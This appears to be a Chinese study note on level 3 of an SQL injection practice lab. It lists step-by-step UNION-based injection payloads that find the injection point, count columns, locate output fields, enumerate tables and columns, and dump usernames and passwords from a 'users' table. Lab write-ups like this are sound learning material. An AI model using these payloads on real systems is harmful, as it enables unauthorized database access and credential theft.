sqli靶场学习记录-第三关

第三关和前面两关没有太大的区别，只是数据访问的方式不一样

1、判断是否存在注入点

1') and 1=1 -- qq

1') and 1=2 -- qq

 

第三关和前两关的区别在于查询数据的方式是1')，注意-- qq之间一定要有空格，网页编译中--空格代表注释，意在将后面的内容注释掉

2、判断字段数

1') order by 3-- qq 

1') order by 4-- qq

 3、判断回显点

0') union select 1,2,3 -- qq

 4、查询数据库版本号和当前数据库名

0') union select 1,database(),version() -- qq

5、爆表

0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- qq

 

6、爆字段名

 0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- qq

7、查询表格内容

0') union select 1,group_concat(username),group_concat(password) from users -- qq 

@-@